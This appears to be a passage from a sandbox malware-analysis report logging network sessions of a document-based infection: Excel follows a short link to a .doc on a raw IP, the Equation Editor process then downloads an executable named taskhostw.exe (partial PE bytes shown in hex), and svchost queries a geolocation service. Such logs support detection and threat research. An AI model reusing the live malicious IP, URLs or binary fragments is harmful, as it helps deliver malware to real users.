                                                                Oct 12, 2024 16:39:44.023523092 CEST1236INData Raw: 30 30 30 30 30 30 09 20 20 20 09 20 09 20 09 09 20 09 20 20 20 20 20 20 20 09 20 20 20 20 20 09 09 20 20 20 09 20 20 09 20 20 09 09 09 09 09 09 20 20 20 20 20 09 20 20 09 09 20 20 20 20 20 09 09 20 09 20 20 20 09 20 09 09 09 09 09 09 20 20 20 09
                                                                Data Ascii: 000000 000 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.2249169104.168.7.25803856C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 16:39:54.554368973 CEST287OUTHEAD /xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc HTTP/1.1
                                                                User-Agent: Microsoft Office Existence Discovery
                                                                Host: 104.168.7.25
                                                                Content-Length: 0
                                                                Connection: Keep-Alive
                                                                Oct 12, 2024 16:39:55.030874014 CEST322INHTTP/1.1 200 OK
                                                                Date: Sat, 12 Oct 2024 14:39:54 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                Last-Modified: Thu, 10 Oct 2024 11:37:22 GMT
                                                                ETag: "15a24-6241dcb39afd0"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 88612
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: application/msword


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.2249170104.168.7.25803164C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 16:39:56.306967020 CEST316OUTGET /450/taskhostw.exe HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: 104.168.7.25
                                                                Connection: Keep-Alive
                                                                Oct 12, 2024 16:39:56.811646938 CEST1236INHTTP/1.1 200 OK
                                                                Date: Sat, 12 Oct 2024 14:39:56 GMT
                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                Last-Modified: Sat, 12 Oct 2024 07:42:35 GMT
                                                                ETag: "13b200-62442bf48212e"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1290752
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: application/lnk
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 92 92 52 12 fc c1 52 12 fc c1 52 12 fc c1 14 43 1d c1 50 12 fc c1 cc b2 3b c1 53 12 fc c1 5f 40 23 c1 61 12 fc c1 5f 40 1c c1 e3 12 fc c1 5f 40 1d c1 67 12 fc c1 5b 6a 7f c1 5b 12 fc c1 5b 6a 6f c1 77 12 fc c1 52 12 fd c1 72 10 fc c1 e7 8c 16 c1 02 12 fc c1 e7 8c 23 c1 53 12 fc c1 5f 40 27 c1 53 12 fc c1 52 12 6b c1 53 12 fc c1 e7 8c 22 c1 53 12 fc c1 52 69 63 68 52 12 fc c1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 63 28 0a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 d0 0a 00 00 00 00 00 4a 7f 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED]
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sRRRCP;S_@#a_@_@g[j[[jowRr#S_@'SRkS"SRichRPELc(g"J@ N@@@L|p<(0q+pH@.text. `.rdata@@.datatR@.rsrc<(p*@@.reloc0qr@@B
                                                                Oct 12, 2024 16:39:56.811671972 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: DAL7hCY:hCY9hCYhC~Y_,hCmYhC\YQchCJYSLQ@SL
                                                                Oct 12, 2024 16:39:56.811687946 CEST1236INData Raw: 4b 14 8d 43 10 89 4d 08 89 45 0c 8b 38 0f b6 84 13 10 08 00 00 8b 09 89 4d e8 83 f8 10 0f 8f 74 a4 03 00 0f 84 4d a4 03 00 83 e8 08 74 5c 48 48 0f 84 06 a4 03 00 48 48 0f 84 b7 a3 03 00 48 48 0f 84 4c a3 03 00 8b 7d f8 ff 45 f4 8b 45 0c 8b 4d 08
                                                                Data Ascii: KCME8MtMt\HHHHHHL}EEMUEM;S|[EMpWVE_^[]}}tWVE8t!EM9t9}ujWPVEUeSVW}3CEW](HulX
                                                                Oct 12, 2024 16:39:56.811702967 CEST1236INData Raw: a1 03 00 83 f8 2b 0f 87 2b 01 00 00 0f 84 67 a1 03 00 83 f8 06 0f 86 79 01 00 00 83 f8 0f 0f 84 a9 00 00 00 83 f8 07 0f 84 80 01 00 00 83 f8 20 0f 85 86 00 00 00 8b c7 c1 e8 10 50 0f b7 c7 50 53 56 e8 0f f9 ff ff eb 7d ba 02 02 00 00 3b c2 77 29
                                                                Data Ascii: ++gy PPSV};w)7;vv8jWSV+KwI-I IWSPVH_^[]VX373JJ
                                                                Oct 12, 2024 16:39:56.811717987 CEST896INData Raw: 00 00 00 0f 85 98 9e 03 00 8d 45 cc 50 ff 33 ff 15 94 f6 48 00 8b 45 d4 8b 4d cc 2b c1 8b 55 d8 89 45 f4 8b 45 d0 2b d0 89 45 e8 8d 45 e4 50 ff 36 89 55 f0 89 4d e4 ff 15 70 f6 48 00 8b 7d e4 8b c7 0f af 45 f8 8b 75 e8 8b 4d ec 99 f7 7d 10 66 89
                                                                Data Ascii: EP3HEM+UEE+EEP6UMpH}EuM}fE}fEE}fEE}fft(EfuE+;t'Ef`uE+;
                                                                Oct 12, 2024 16:39:56.811732054 CEST1236INData Raw: 83 38 00 75 0c b9 0c 58 4c 00 e8 95 13 00 00 eb dc 8b e5 5d c2 04 00 55 8b ec 83 ec 14 8b 4d 08 a1 10 58 4c 00 53 56 57 8b 04 88 b9 b0 57 4c 00 ff 75 10 8b 18 89 5d fc e8 10 04 00 00 6a 0f 8b f0 c6 45 0b 00 ff 15 28 f5 48 00 83 7b 4c ff 8b f8 74
                                                                Data Ascii: 8uXL]UMXLSVWWLu]jE(H{Lt{L$XLKHyiwq"@$"@E{LuUj(HPu H}:ju8HjH_^[]tj"E
                                                                Oct 12, 2024 16:39:56.811747074 CEST1236INData Raw: 00 40 88 1d bc 57 4c 00 57 83 cf ff a2 b0 57 4c 00 b9 f0 57 4c 00 a3 b4 57 4c 00 89 1d c0 57 4c 00 a3 c8 57 4c 00 89 1d d0 57 4c 00 89 1d d4 57 4c 00 89 3d d8 57 4c 00 89 1d dc 57 4c 00 89 1d e0 57 4c 00 89 1d e4 57 4c 00 88 1d e8 57 4c 00 e8 10
                                                                Data Ascii: @WLWWLWLWLWLWLWLWL=WLWLWLWLWLQj^j|XfWL3XLHXLXLXL=XL XLH$XL(XL,XL50XL4XL8XL<XL@XL=DXL=HXL|XLXLXL=XLfWL.
                                                                Oct 12, 2024 16:39:56.811762094 CEST1236INData Raw: 1c 58 4c 00 83 f9 ff 74 2f 8b 55 08 8d 42 0d 83 f8 0d 77 24 a1 10 58 4c 00 ff 75 0c c1 e2 04 8b 04 88 8d 8a 5c 01 00 00 8b 00 03 c8 e8 40 56 00 00 33 c0 40 5d c2 0c 00 33 c0 eb f8 55 8b ec 51 51 83 7d 18 00 0f 85 b2 98 03 00 8b 0d 1c 58 4c 00 83
                                                                Data Ascii: XLt/UBw$XLu\@V3@]3UQQ}XLtt}XLVW}0E3@E}tMg~L}6EjPFLEu*E u'~8Y_^]3vLxFPFTU\D$SVu
                                                                Oct 12, 2024 16:39:56.811778069 CEST1236INData Raw: 8d 49 00 06 30 40 00 e4 2f 40 00 e2 cf 43 00 2b d0 43 00 47 d0 43 00 c4 cf 43 00 06 30 40 00 00 01 01 02 02 01 01 01 06 03 06 03 06 04 06 01 06 01 06 01 06 05 06 01 55 8b ec 83 ec 40 a1 78 52 4c 00 56 33 f6 a3 04 58 4c 00 6a 0f c7 45 c4 30 00 00
                                                                Data Ascii: I0@/@C+CGCC0@U@xRLV3XLjE0E+uEEu0HEEEEEEPuEHE@$HhHfRLHXLEPEE;Hjjj!jjHh5XL\XL(HPj5
                                                                Oct 12, 2024 16:39:56.811793089 CEST1236INData Raw: 33 c9 89 46 0c f7 e3 57 0f 90 c1 f7 d9 0b c8 51 e8 43 da 01 00 83 7e 04 00 8b f8 59 0f 85 a9 9c 03 00 89 7e 04 5f 53 e8 2c da 01 00 8b d0 59 85 d2 74 1d 8b 4d 08 8b 09 89 0a 8b 4e 08 8b 46 04 89 14 88 ff 46 08 5e 5b 5d c2 04 00 8b c1 eb b0 33 d2
                                                                Data Ascii: 3FWQC~Y~_S,YtMNFF^[]3VNVF4fFYN^$VW39~of_^VHv-Y^UQQEHPjhDHf}1]UQQ}SVtrutk33fEPj
                                                                Oct 12, 2024 16:39:56.817090034 CEST1236INData Raw: e8 69 60 00 00 8d 4d b4 e8 61 05 00 00 83 65 a0 00 8d 4d b4 c6 45 c4 00 e8 55 06 00 00 8d 4d a4 e8 8d 20 00 00 5f 5e 5b 8b e5 5d c2 08 00 33 f6 e9 47 ff ff ff 56 57 8b 35 20 f7 48 00 33 ff 57 ff 35 78 52 4c 00 b8 00 00 00 80 57 57 6a 64 68 2c 01
                                                                Data Ascii: i`MaeMEUM _^[]3GVW5 H3W5xRLWWjdh,PPhlHPPWW5xRLRLjPWWWWhPWhHW5HW5RLRLW5RL_^U8VWj0Hhj,H5(Hjc5xRLEh5xRLRLh5xR


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.2249173178.237.33.50803316C:\Windows\SysWOW64\svchost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 16:40:03.074881077 CEST71OUTGET /json.gp HTTP/1.1
                                                                Host: geoplugin.net
                                                                Cache-Control: no-cache
                                                                Oct 12, 2024 16:40:03.717297077 CEST1170INHTTP/1.1 200 OK
                                                                date: Sat, 12 Oct 2024 14:40:03 GMT
                                                                server: Apache
                                                                content-length: 962
                                                                content-type: application/json; charset=utf-8
                                                                cache-control: public, max-age=300
                                                                access-control-allow-origin: *
                                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.2249161188.114.96.34433564C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-12 14:39:43 UTC321OUTGET /7al0eY HTTP/1.1
                                                                Accept: */*
                                                                UA-CPU: AMD64
                                                                Accept-Encoding: gzip, deflate
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: shuvi.io
                                                                Connection: Keep-Alive
                                                                2024-10-12 14:39:43 UTC997INHTTP/1.1 302 Found
                                                                Date: Sat, 12 Oct 2024 14:39:43 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 197
                                                                Connection: close
                                                                X-DNS-Prefetch-Control: off
                                                                X-Frame-Options: SAMEORIGIN
                                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                X-Download-Options: noopen
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 0
                                                                Location: http://104.168.7.25/xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc
                                                                Vary: Accept
                                                                X-Served-By: shuvi.io
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Zix60zoPxeO4fd1q%2BwHvZqVCPX8t8z3UkBYxGC%2F3FRZ%2Fo6ZMcQLtLTi8VYiZvDPCtHrwWsogtlIKScV2O0RDuYCXGWZbf7dAizwN4sXtT9bVehT8v%2B%2FCyEEJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d17d747fdba0fa9-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-12 14:39:43 UTC197INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 34 2e 31 36 38 2e 37 2e 32 35 2f 78 61 6d 70 70 2f 65 77 2f 77 65 63 72 65 61 74 65 64 6e 65 77 74 68 69 67 73 66 6f 72 73 75 63 63 65 73 73 66 75 6c 6c 6a 6f 75 72 6e 65 63 79 72 5f 5f 5f 5f 5f 5f 5f 5f 76 65 72 79 6e 69 63 65 70 65 6f 70 6c 65 73 65 74 69 72 65 74 68 69 67 73 74 6f 67 6f 66 6f 72 6d 65 67 72 65 61 74 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 6e 6e 69 63 77 61 79 74 6f 65 6e 74 72 65 69 74 68 69 67 6e 74 6f 63 68 61 6e 67 65 77 69 74 68 6d 65 67 72 65 61 74 2e 64 6f 63
                                                                Data Ascii: Found. Redirecting to http://104.168.7.25/xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.2249163188.114.97.34433856C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-12 14:39:45 UTC130OUTOPTIONS / HTTP/1.1
                                                                User-Agent: Microsoft Office Protocol Discovery
                                                                Host: shuvi.io
                                                                Content-Length: 0
                                                                Connection: Keep-Alive
                                                                2024-10-12 14:39:45 UTC822INHTTP/1.1 200 OK
                                                                Date: Sat, 12 Oct 2024 14:39:45 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                X-DNS-Prefetch-Control: off
                                                                X-Frame-Options: SAMEORIGIN
                                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                X-Download-Options: noopen
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                Allow: GET,HEAD
                                                                X-Served-By: shuvi.io
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tsxXXXcwimy8HoELOnA%2FGLSYV53tIs3nGFmVgtQiC8OouafmcRl4JeC1dSjlFen5OJEdnj3aR68UwzaSjRQk7VsRukNyU2YjZ6Pr9MsZP37EgdJeBgsyJ8f%2Bvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d17d7573a818c0f-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-12 14:39:45 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                                                Data Ascii: 8GET,HEAD
                                                                2024-10-12 14:39:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.2249164188.114.97.34433856C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-12 14:39:46 UTC115OUTHEAD /7al0eY HTTP/1.1
                                                                Connection: Keep-Alive
                                                                User-Agent: Microsoft Office Existence Discovery
                                                                Host: shuvi.io
                                                                2024-10-12 14:39:46 UTC1011INHTTP/1.1 302 Found
                                                                Date: Sat, 12 Oct 2024 14:39:46 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 197
                                                                Connection: close
                                                                X-DNS-Prefetch-Control: off
                                                                X-Frame-Options: SAMEORIGIN
                                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                X-Download-Options: noopen
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                Location: http://104.168.7.25/xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doc
                                                                Vary: Accept
                                                                X-Served-By: shuvi.io
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h3f71ojQqU1OIUSjOTpwbOkyFWS2oIswD2wL%2Bvywsnz%2F%2FY3xofYVhLg5S6hih1QV7viNYiNKcUs5ZaJmxf2d0J3YikDf6C%2F%2FmTlBQJ2EnCua%2Bm8sQZUL6eiwgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d17d75d6da2440b-EWR
                                                                alt-svc: h3=":443"; ma=86400


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                3192.168.2.2249165188.114.97.3443
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-12 14:39:51 UTC125OUTOPTIONS / HTTP/1.1
                                                                Connection: Keep-Alive
                                                                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                                translate: f
                                                                Host: shuvi.io
                                                                2024-10-12 14:39:52 UTC822INHTTP/1.1 200 OK
                                                                Date: Sat, 12 Oct 2024 14:39:52 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                X-DNS-Prefetch-Control: off
                                                                X-Frame-Options: SAMEORIGIN
                                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                X-Download-Options: noopen
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                Allow: GET,HEAD
                                                                X-Served-By: shuvi.io
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yngd6dG6rCY42zxEoDdakslqubqT49uo039gVW2igAYkOSTSlh6O2EDxVwVCTgC30iz6fUwkv9UUMUoauid39r%2BMNokvvHaE%2BcEpuSFRrg3E9AiqdAuWyyabNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d17d77e2a7842dd-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-12 14:39:52 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                                                Data Ascii: 8GET,HEAD
                                                                2024-10-12 14:39:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                4192.168.2.2249166188.114.96.3443
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-12 14:39:52 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 68 75 76 69 2e 69 6f 0d 0a 0d 0a
                                                                Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: shuvi.io
                                                                2024-10-12 14:39:53 UTC865INHTTP/1.1 404 Not Found
                                                                Date: Sat, 12 Oct 2024 14:39:53 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                X-DNS-Prefetch-Control: off
                                                                X-Frame-Options: SAMEORIGIN
                                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                X-Download-Options: noopen
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                Content-Security-Policy: default-src 'none'
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xO4ATnQxDN%2BDV0YZuunCA%2FhxvL2CaMYEb%2FbIsx9FPhUrgcadwm54XkljDBar%2FQAu8GSSK%2F3VzYN9Yk1FdWDx1PX%2FXAlrGtOQvJ5l7zaMYaeWvOAXNlxRYdcnsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d17d783e86a8c78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-12 14:39:53 UTC149INData Raw: 38 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: 8f<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
                                                                2024-10-12 14:39:53 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                Data Ascii: 1
                                                                2024-10-12 14:39:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                5192.168.2.2249167188.114.96.3443
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-12 14:39:53 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 68 75 76 69 2e 69 6f 0d 0a 0d 0a
                                                                Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: shuvi.io
                                                                2024-10-12 14:39:53 UTC859INHTTP/1.1 404 Not Found
                                                                Date: Sat, 12 Oct 2024 14:39:53 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                X-DNS-Prefetch-Control: off
                                                                X-Frame-Options: SAMEORIGIN
                                                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                X-Download-Options: noopen
                                                                X-Content-Type-Options: nosniff
                                                                X-XSS-Protection: 1; mode=block
                                                                Content-Security-Policy: default-src 'none'
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DZpCVrwdCNlWEoQRZ%2FY3LEkoby9aATkpRrr7nvCgyBAOLz4X41VrKXClFhkBVvOS6B4XRkmw4TMhz9K5cAeOc%2FeouvVH3rgdKIP%2BamcwTOK37kHhHXGVLGFmWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d17d7885e8541ad-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-12 14:39:53 UTC149INData Raw: 38 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: 8f<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>
                                                                2024-10-12 14:39:53 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                Data Ascii: 1
                                                                2024-10-12 14:39:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
